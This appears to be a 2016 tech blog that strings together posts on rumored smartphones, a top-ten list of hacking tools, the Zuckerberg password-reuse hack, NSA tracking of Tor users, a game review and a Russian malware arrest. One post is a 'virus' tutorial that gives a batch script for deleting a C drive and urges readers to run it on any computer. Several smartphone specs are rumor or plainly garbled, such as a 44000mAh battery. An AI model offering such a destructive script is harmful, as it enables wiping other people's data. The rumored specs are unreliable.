Thursday 9 June 2016

Top 10 upcoming smartphone releases

There are some very exciting upcoming smartphone releases that are just gonna rock the technology world with their impressive features, futuristic innovations and awesome quality.Here is our countdown of the top 10!


10.LG G Flex 3

As per now LG has launched LG G5 on 21st Feb with really impressive and advanced specification and now G Flex 3 is not so far from launch. As per rumors LG will soon unveil LG G Flex 3 smartphone in mid 2016.



Key Features

  • 6-inch Full HD display
  • Android v6.0
  • Snapdragon 820 SoC
  • Adreno 530 GPU
  • 4GB RAM
  • 32, 64GB storage
  • 20 MP primary camera
  • 8MP front camera
  • 3500 mAh battery

9. Samsung Galaxy S7 Edge( plus )

Samsung galaxy S7 edge plus will be the next best Smartphone from Samsung, after Launching the S7 and S7 edge, Samsung is thinking to upgrade the Galaxy S7 Device with the upcoming smartphone s7 edge plus. However there is no confirmed Release date of the device, but it seems as it may be announced in upcoming 3 to 4 months. First the device will be made available in USA, Brazil, and other countries, then it will enter India.



The Samsung galaxy S7 edge(plus),  is packed with some high-end specifications, and the device will also come with some enhancement like improved camera and improved the quality of display.Apart from this improvement the specs will be similar to Samsung Galaxy S7edge. Samsung galaxy S7 edge plus will have a coparetivlylower price tag than Samsung galaxy S7.

8. Sony Xperia M Ultra

According to a new rumor out of China, Sony will launch a new smartphone dubbed Xperia M Ultra. Specs-wise, the device is said to be powered by Snapdragon 652 chipset, and sport a 6-inch full HD display.There are some other specs rumors we are getting like, the Sony Xperia M Ultra will sports a 6-inch Full HD IPS-NEO screen display. The device will be powered by Qualcomm Snapdragon 652 SoC, along with 3GB of RAM,The devise will have 32 GB storage.





Key Features


  • 3GB RAM
  • 23-megapixel and 16-megapixel front
  • 6-inch Full HD IPS-NEO Display
  • 32 GB of inbuilt memory
  • Boosted by Snapdragon 652 processor

7. Xiaomi Mi 6

Xiaomi is the brand which is pretty famous for its cheap and high-end smartphones. Xiaomi.Mi6 is supposed to be prepared through a 5.2” (inch) UHD display, which is perfect if love to watch movies on your smart phones.




Key Features

  • Ultra HD 2160 x 3840 pixels Super AMOLED display
  • Qualcomm Snapdragon 830
  • with 6GB of powerful RAM
  • may come with 5g network
  • 4200mah battery
  • 21-Megapixels back and 13-Megapixels front camera

6. HTC and Google’s Nexus Smartphones

After the launch of its flagship smartphone HTC 10 and another variant HTC 10 Lifestyle now they will be looking at the Nexus series smartphones this year, as per the rumors the HTC has been selected by google for the next best nexus upcoming smartphones. The previous smartphones were created by Huawei and Google as Nexus 6P and Nexus 5x, but it looks now the contract is over, and Google has found the best partner for its next device.




HTC as per the rumours they will be making two Nexus devices one is really premium and another is budget Smartphone. The specifications of the smartphones are not leaked anywhere, but we manage to bring some most suitable specs for the high-end nexus smartphone.

Key Features


  • Packed with Qualcomm Snapdragon 830 chip
  • It will be powered with a 4GB of RAM
  • It will have 5.5-inch 2,560 x 1,440 quad-HD AMOLED display
  • 21-megapixel camera on the back 
  • 16, 32, 64, 128GB storage and will have expandability option
  • 44000mAh last longer battery

5. Nokia C1


Finally Nokia officially announced that they are coming back in mobile industry. Nokia has made an agreement with HMD.The wait is finally over for those who love Nokia phones. We may see some best Nokia smartphones at the end of 2016.



Key Features


  • 2GB of RAM
  • 32GB internal storage
  • 4G support
  • 8-megapixel rear camera and 5-megapixel front camera
  • 5-inch display
  • The price will be Less than 20k in India and Approx 300 $


4. Microsoft Surface Phone

It seemed inevitable that Microsoft would create a Surface Phone — not an official name — after it acquired Nokia. In fact, there was talk long before that too, but Microsoft has often denied those rumors and stuck with producing new Lumia phones. However, rumors and leaks regarding such a device have continued, suggesting it’s something the company may still be considering.It is expected to e released in late 2016 or early 2017.


Key Features


  • Quad HD 5.5-inch AMOLED screen
  • Gorilla Glass 4
  • Snapdragon processor 830
  • 8GB of RAM (DDR4)
  • 21-megapixel rear camera and 8MP front camera
  • 64GB or 128GB of internal storage
  • 4000mAh battery

3. OnePlus three (3)

OnePlus 3 will be the successor of OnePlus 2.There are many rumours spreading about the features OnePlus three is likely to have.Anyway, it is clear that this device will be more efficient and powerful than its previous version.That is exciting news because, the previous version OnePlus two was noted for its good camera and fabulous performance. OnePlus 3 will be released on 15th June 2016.



Key Features

  • 4 and 6 GB RAM Variant
  • 5.5-inch AMOLED full HD display
  • Snapdragon 820 processor
  • 16-megapixel back and 8-megapixel front cam
  • Oxygen OS with android M

2. Samsung Galaxy Note 6

It’s not long until the release date of the Samsung’s Galaxy Note 6 is officially announced, and the rumours are rapidly reaching fever pitch. With whispers of Android N, USB Type-C, a whopping 6GB of RAM and a frankly outrageous 256GB of storage, the Note 6 is set to be a beast.



And if that doesn't whet your whippet, then the news of a 5.77in, 2K Super AMOLED display just might.


Key Features


  • 30MP and 16MP isocell camera
  • 6 GB RAM can touch up to 8GB
  • Include 4700mAh battery
  • Storage option from 16GB to 256GB
  • Samsung Exynos 9 Octa processor
  • 5.5-inch 4K display

1. Apple iPhone 7

The iPhone 7 should be more revolution than evolution, and will come with a raft of new features, all packaged in a totally redesigned handset. Apple has kept most of the iPhone 7 details under wraps, but as we approach its release date, we’re slowly uncovering more details about the next iPhone.It is rumored that iPhone 7 will have a built in projector!




Key Features


  • The iPhone 7 will be packed with iOS 10
  • Upgraded Apple A10 chipset processor
  • Have an e-SIM traditional SIM card will no more.
  • Waterproof Technology
  • Reversible USB charger
  • No headphone jack this time
  • Will be available in 4.7-inch and 5.5-inch variant.
  • Slimmest iPhone ever created
  • Iphone 7 will be cost approx Rs. 61454.72 in India and USD $937


Wednesday 8 June 2016

Top 10 Hacking Tools Of 2016



A hacking tool is a program designed to assist with hacking, or a piece of software which can be used for hacking purposes. Examples include Nmap, Nessus, John the Ripper, p0f, and Winzapper.

Here are the Top Best Ethical Hacking Tools 2016:


1 Metasploit 



Metaspoit: Best Hacking Tools of 2016 


Metasploit is available for all major platforms including Windows, Linux, and OS X. Rather than calling Metasploit a collection of exploit tools, I like to call it an infrastructure that you can utilize to build your own custom tools. This free tool is one of the most popular cyber security tools around that allows you to locate vulnerabilities at different platforms. Metasploit is backed by more than 200,000 users and contributors that help you to get insights and uncover the weaknesses in your system. 

This top hacking tool package of 2016 lets you simulate real-world attacks to tell you about the weak points and finds them. As a penetration tester, it pin points the vulnerabilities with Nexpose closed–loop integration using Top Remediation reports. Using the open source Metasploit framework, users can build their own tools and take the best out of this multi-purpose hacking tool.

2 Nmap



Nmap is available for all major platforms including Windows, Linux, and OS X. I think everyone has heard of this one, Nmap (Network Mapper) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts.Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use,and dozens of other characteristics. It may be used to discover computers and services on a computer network, thus creating a “map” of the network.Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.Can be used by beginners (-sT) or by pros alike (packet_trace). Nmap can be a very versatile tool, once you fully understand the results.

3 Acunetix WVS 


Acunetix is available for Windows XP and higher. Acunetix is a web vulnerability scanner (WVS) that scans and finds out the flaws in a website that could prove fatal. This multi-threaded tool crawls a website and finds out malicious Cross-site Scripting, SQL injection, and other vulnerabilities. This fast and easy to use tool scans WordPress websites form more than 1200 vulnerabilities in WordPress.
Acunetix comes with a Login Sequence Recorder that allows one to access the password protected areas of websites. The new AcuSensor technology used in this tool allows you to reduce the false positive rate. Such features have made Acunetix WVS a preferred hacking tools that you need to check out in 2016.

4 Wireshark 


This free and open source tool was originally named Ethereal. Wireshark also comes in a command-line version called TShark. This GTK+-based network protocol analyzer runs with ease on Linux, Windows, and OS X. Wireshark is a GTK+-based Wiresharknetwork protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.It works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams. 

5 oclHashcat 


This useful hacking tool can be downloaded in different versions for Linux, OSX, and Windows. If password cracking is something you do on daily basis, you might be aware of the free password cracking tool Hashcat. While Hashcat is a CPU-based password cracking tool, oclHashcat is its advanced version that uses the power of your GPU.
oclHashcat calls itself world’s fastest password cracking tool with world’s first and only GPGPU based engine. For using the tool, NVIDIA users require ForceWare 346.59 or later and AMD users require Catalyst 15.7 or later.

This tool employs following attack modes for cracking:
  • Straight 
  • Combination 
  • Brute-force 
  • Hybrid dictionary + mask 
  • Hybrid mask + dictionary 
Mentioning another major feature, oclHashcat is an open source tool under MIT license that allows an easy integration or packaging of the common Linux distros.

6 Nessus Vulnerability Scanner 


Nessus is supported by a variety of platforms including Windows 7 and 8, Mac OS X, and popular Linux distros like Debian, Ubuntu, Kali Linux etc. This top free hacking tool of 2016 works with the help of a client-server framework. Developed by Tenable Network Security, the tool is one of the most popular vulnerability scanners we have. Nessus serves different purposes to different types of users – Nessus Home, Nessus Professional, Nessus Manager and Nessus Cloud. 

Using Nessus, one can scan multiple types of vulnerabilities that include remote access flaw detection, misconfiguration alert, denial of services against TCP/IP stack, preparation of PCI DSS audits, malware detection, sensitive data searches etc. To launch a dictionary attack, Nessus can also call a popular tool Hydra externally.
Apart from the above mentioned basic functionalities, Nessus could be used to scan multiple networks on IPv4, IPv6 and hybrid networks. You can set scheduled scan to run at your chosen time and re-scan all or a subsection of previously scanned hosts using selective host re-scanning.

7 Maltego



Maltego hacking tool is available for Windows, Mac, and Linux. Maltego is an open source forensics platform that offers rigorous mining and information gathering to paint a picture of cyber threats around you. Maltego excels in showing the complexity and severity of points of failure in your infrastructure and the surrounding environment. 

Maltego is a great hacker tool that analyzes the real world links between people, companies, websites, domains, DNS names, IP addresses, documents and whatnot. Based on Java, this tool runs in an easy-to-use graphical interface with lost customization options while scanning. 


8 Social-Engineer Toolkit 




Apart from Linux, Social-Engineer Toolkit is partially supported on Mac OS X and Windows. Also featured on Mr. Robot, TrustedSec’s Social-Engineer Toolkit is an advanced framework for simulating multiple types of social engineering attacks like credential harvestings, phishing attacks, and more.  

This Python-driven tool is the standard tool for social-engineering penetration tests with more than two million downloads. It automates the attacks and generates disguising emails, malicious web pages and more. 

To download SET on Linux, type the following command:

git clone https://github.com/trustedsec/social-engineer-toolkit/ set/

9 Nessus Remote Security Scanner 





Recently went closed source, but is still essentially free. Works with a client-server framework. Nessus Remote Security Scanner is the worlds most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the worlds largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications. 

10 Kismet 




Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with Kismetany wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic. A good wireless tool as long as your card supports rfmon.

Tuesday 7 June 2016

Hackers everywhere!!! Zuckerberg’s social media accounts hacked!!! Learn how to protect your's


"Hackers, hackers everywhere,social media is safe no more!".

Facebook CEO Mark Zuckerberg would be one person you’d think would use good security to protect social media accounts. Apparently,even billionaire tech entrepreneurs get hacked.

Facebook Inc.’s first “security tip” for users is, “Don’t use your Facebook password anywhere else online.”

But, its founder did not heed that advice.


Mr. Zuckerberg’s Twitter Inc. and Pinterest Inc. accounts were taken over on Sunday because he reused a password: “dadada”. The password had appeared last month in a database of more than 100 million usernames and passwords stolen in 2012 from LinkedIn Corp. Mr. Zuckerberg appears to have reused “dadada” to log into Twitter and Pinterest, allowing hackers to take over those accounts. 

The hacker group OurMine took responsibility, and claimed they were just trying to raise awareness.



How hackers hack Facebook Account

Inorder to learn how to protect your social media acoounts you must first understand how hackers hack ocial media acoounts

Email Address Hack


For email address hack, all a hacker needs to do is know your name and he will be conveniently shown your email address at your Facebook profile. Then hacker's can hack your Facebook account (and everything else associated with that email id) if he 'guesses' your password (if you use a weak password) or answers your security question! This is something I hope Facebook improves on quickly.




Phishing

Phishing is one of the easiest ways to trick users into giving out their login credentials. All a hacker does is setup a webpage similar in design to that of the Facebook homepage, attach a server sided script to track the username and password entered and store it in a log. Sending people emails stating that someone tagged a photo of them on Facebook in the same format as Facebook and giving a link below to the phishing website further reduces the chances of it being detected as a fake. Sometimes, spam Facebook apps, like those promising to tell who viewed your Facebook profile, automatically post links to phishing websites. A new trend amongst phishers is creating Facebook look-a-like widgets for stealing user's login credentials.

Key logging through Keyloggers

Keylogger is a type of computer virus that tracks key strokes. Keyloggers can be installed remotely on a computer system by a cracker to record all the activity that is going on the victim's computer. Keylogging gets more easy if the hacker has physical access to the victim's computer.

Social Engineering

Social engineering involves using any trick to fool the user into making himself vulnerable to exploits. This could involve anything from sending spoof emails, pretending to be from Facebook, telling you to change your password to 12345678 to a hacker maliciously getting out the answer to your security question in a friendly chat or discussion.



Now the question is "How to prevent your Facebook Account from being Hacked?"

Following Three Security Options makes your Facebook Account Secure and Hack Proof.

1.You can enable Login Notification so that whenever any body (or a hacker) tries to login with your User ID and Password, you will receive a Notification on your cell phone and you will come to know that it's time to change your password right now because the hacker has got your password and is trying to log in to your Facebook Account.

To Enable Login Nofication
Go to Home -> Account Settings -> Security -> Login Notification

Put a Check Mark on your preffered option and

click Save Changes button.


2.Always check your Active Sessions. If you notice any unfamiliar location or device, it means your Facebook Account is at risk. Just click on End Activity and dont forget to change your password after that.

To Check Active Sessions
Go to Home -> Account Settings -> Security -> Active Sessions.

3.Enable Secure Browsing to make your account more secure.
Go to Home-> Account Settings -> Security -> Secure Browsing.


Sources: Google,CNBC.com,bgr.com

The NSA will spy on you for reading this article


Are you looking for ways to protect your privacy while browsing the web? Are you trying to learn how to use Tor, the browser that anonymize your Internet traffic? Are you interested in ditching Windows for something that’s more privacy-friendly? The good news is that there are ways to do that. The bad news is that this sort of online behavior apparently triggers NSA spying, especially if you’re a foreigner.

A report from German site Tagesshau reveals that the NSA has a computer system dedicated to accessing Tor called XKeyscore. The NSA apparently digs for “deep-packet inspection” Internet users located outside of U.S., Canada, the U.K. and other countries that comprise the Five Eyes countries that work with the NSA on surveillance programs.


Hating Windows is apparently another infraction that will get you on the short list, especially if you’re looking to install the Tails operating system, which is generally used by people looking to guard their privacy.

Reporting on Tagesshau’s findings, Boing Boing speculates that the NSA and its partners might be using these simple mass surveillance spying practices to divide Internet users into two principal categories: Those who don’t care about guarding their privacy online, and those who use services like Tor, Tails and others.

It appears that even looking for information about Tor and Tails – and potentially reading this post – will get you fingerprinted.


The NSA’s intention here was to separate the sheep from the goats – to split the entire population of the Internet into ‘people who have the technical know-how to be private’ and ‘people who don’t’ and then capture all the communications from the first group,” the site continues. 



It’s believed that details about this NSA operation may come from a second source other than Snowden, although it’s not clear who that person is. 

Even though it might sound scary to the regular user looking for online data protection, the NSA’s thinking isn’t illogical. It makes perfect sense to want to know who’s looking to hide their online activity behind things like Tor and Tails because some of the people who do it are indeed up to no good. They’re not reporters looking to protect their sources, and they’re not living in oppressed countries. Some of them are the bad guys the NSA is trying to catch, and bad guys will almost certainly want to protect all online activity with the help of these encrypted technologies.


The investigation discloses the following:
  • Two servers in Germany - in Berlin and Nuremberg - are under surveillance by the NSA. 
  • Merely searching the web for the privacy-enhancing software tools outlined in the XKeyscore rules causes the NSA to mark and track the IP address of the person doing the search. Not only are German privacy software users tracked, but the source code shows that privacy software users worldwide are tracked by the NSA. 
  • Among the NSA's targets is the Tor network funded primarily by the US government to aid democracy advocates in authoritarian states. 
  • The XKeyscore rules reveal that the NSA tracks all connections to a server that hosts part of an anonymous email service at the MIT Computer Science and Artificial Intelligence Laboratory (CSAIL) in Cambridge, Massachusetts. It also records details about visits to a popular internet journal for Linux operating system users called "the Linux Journal - the Original Magazine of the Linux Community", and calls it 
    an "extremist forum".
























sorces:

bgr.com, Das Erste, Boing Boing, Google



Monday 6 June 2016

Mirrors Edge Catalyst-Game Review

Our Rating : 6.9/10


PROS 


* Traversal is fun.
* AI forces you to vary combat.
* Story picks up after initial stumble.

CONS


* 
The city of Glass is lifeless. 

* Inconsistent visuals.

Annoying characters

Mirror's Edge Catalyst a reboot of Mirrors Edge.The game is set in a pristine city, ruled by a ruthless Conglomerate. Faith, a skilled Runner reluctantly drawn into an anti-Conglomerate struggle.The anti-Conglomeratestruggle is lead by a group called the “Black November”.Through her journey, Faith explores every corner of the city, from the highest, most pristine skyscrapers, to the dark and dingy tunnels that underlie the city. Players must master the environment, using their momentum and timing their combat to fight the oppressiveness of the ruling elite, uncovering the dark secrets behind the city’s beautiful facade.


Mirror's Edge Catalyst's pace picks up quite well after stumbling at the opening. There's a prolonged cut-scene and some annoying banter along with some necessary tutorialisation that teaches you the basics. These include learning how to kick guards into railings, run across many a gap, and simply come to terms with the game world. Some of these early segments aren't clearly explained and you will probably fail them a couple of times before you realise what's needed of you, such as an early mission wherein you have to maintain your momentum while running and hitting foes in your way to a location to drop off a delivery.

But once that's over, things pick up quite a bit. The story barely drops a beat and there's always something going on. What's more is that you'll end up exploring most areas of Glass by the time you're done, which allays our early thoughts that runner vision - the game's navigation feature - would lead you on the straight and narrow, with little else. There's a steady stream of unlockable skills as you take on story missions such as being able to turn quickly (or quickturn as its called) or swing between gigantic chasms. Not only does it provide incentive to complete the game's narrative-based levels, but it also introduces you to several nuances as you play along.

The game has a basic combat system.You can dodge incoming strikes, move backwards to avoid getting hit, and use heavy and light attacks to even the odds. Furthermore, you can use your own momentum as well, what with the force of springboarding off a ledge to hit a security guard allowing you to do more damage. Despite a somewhat minimal set of options, it's interesting how varied combat can get thanks to AI that's responsive to every move. If you keep mashing the same buttons, you'll soon realise that your attacks are blocked or countered, and that you'll be greeted by a game over screen. If you want to get past most of Mirror's Edge: Catalyst's encounters, varying your approach is most helpful.


In my opinion the city of Glass itself is the biggest let down in the game. Of course it would be unfair to expect anything along the lines of The Witcher 3 or Grand Theft Auto V in terms of atmosphere, but it doesn't even come close to the multiple entries in the Assassin's Creed or Far Cry franchises. You'll sabotage surveillance, steal computer chips, and collect glowing orbs of intel known as gridleaks, but it feels devoid of life. This ensures the most fun you'll have is in the story missions rather than exploring Glass and the secrets it holds.

Mirror's Edge Catalyst isn't a perfect return of the 2008 cult classic as many expected.But, if you're just looking for a free-running romp through a city ruled by shady corporations backed up by slick controls and navigation, you wont be disappointed. 

Create an awesome computer virus in seconds( C-Drive TERMINATOR)!!!


Have you ever wondered how these computer geeks and hackers make these cool programs called computer virus?

A virus is a small but insidious piece of programming-code that attacks computer and network systems through 'contaminated' (infected) data files, introduced into a system via disks or internet. 

Do you know that you can create a virus in notepad !!!


Now I am going to show you how to create a virus that terminates an entire drive form the computer.



WARNING

Do not test this on your own computer or all your system files will be deleted and the system will fail to boot.


STEPS

1. Open notepad.(go to start--->Search--->Notepad)


2.Type the following command in notepad:

@echo off
Del C:\ *.* /y


3. Save this file as 'virus.bat' in your desktop or any other place.

Your C terminator virus is armed and ready for attack.

4. Run it on any computer you like.

NOTE
  • You can use any name as you want for your virus file.
  • Don't forget to save in .bat format.
  • The virus becomes active on double-click(Don't Run it on your computer. You will not be able to recover anything lost from the terminated drive and the OS will crash/fail to boot).

Sunday 5 June 2016

Apple MacBook Pro will feature OLED touch bar panel



A week ago, one well-placed analyst said Apple would launch a MacBook Pro in late 2016 with a touch-enabled OLED panel to replace the function keys at the top of the keyboard. Now, leaked images appear to back those claims. In addition, they show that Apple may be planning to eradicate all connectors on its top-of-the-line laptop except for USB-C ports.

leaked image of new macbook pro
The images were obtained by Cult of Mac and show the aluminum chassis of a laptop. The photos are attributed to an anonymous source who claims to work for one of Apple's manufacturing partners in China. The images show a space at the top of the keyboard where an OLED panel could be placed, with KGI Securities analyst Ming-Chi Kuo saying in a research note last week that the move could be used to allow Apple to bring its Touch ID fingerprint sensor to its MacBook range.
The speakers on the current model that sit at the back of the keyboard would need to be relocated, as images of the new model show speaker grilles at the side.


The images also show just four USB ports — presumably all of which will be USB Type C — meaning Apple would be removing the MagSafe connector for charging, SD card slot, HDMI connector and Thunderbolt ports. Apple has already replaced all ports on its 12-inch MacBook with USB-C, so it wouldn't be a surprise to continue the trend on its bigger MacBook.

It is hard to tell from the images the size and weight of the 2016 version of the MacBook Pro, but Kuo has said the new design would be thinner or lighter than the current model, thanks to a new technique to create metal injection molded hinges.

Kuo says Apple isn't planning to announce its new MacBooks at its annual developer conference in a couple of weeks as many expected, but will launch them in the final quarter of 2016.

Saturday 4 June 2016

Fifty Russian Hackers Arrested for Stealing $25.5M


Russia has arrested 50 people accused of using malware to steal more than 1.7bn roubles ($25m; £18m).The gang allegedly seeded websites with malware that gave them access to victims' PCs and, from there, their bank accounts.

Technical tricks used by the hackers made it hard for security software to spot the malicious code once it had compromised a machine.It is believed to be the largest ever arrest of hackers in Russia.


The Federal Security Service (FSB) — alongside Interior Ministry and National Guard troops — made arrests in 15 regions across the country.

"As a result of [house] searches a large quantity of computer equipment was confiscated along with communications gear, bank cards in false names, and also financial documents and significant amounts of cash confirming the illegal nature of their activity," the FSB said.



The gang is believed to have stolen cash using a malicious trojan called Lurk that it hid on some of Russia's most popular websites.

Anyone visiting a website booby-trapped with Lurk would be infected with the malware. Once on a victim's PC, the malware then downloaded more software modules, giving the cyber thieves remote access to the machine.


This was used to steal login names and passwords for online bank accounts. In particular, they targeted accounts held at Sberbank - one of Russia's largest banks.

"Lurk started attacking banks one-and-a-half years ago; before then its malicious program targeted various enterprise and consumer systems," said Ruslan Stoyanov, head of computer incident investigation at Kaspersky Lab that helped uncover the gang's activities.

Mr Stoyanov said Kaspersky helped police profile the gang's network of computers and servers used to grab cash, and from that information they were able to trace the individuals involved.


The arrests helped to thwart pending money transfers that would have netted the group a further 2.3bn roubles, the FSB said.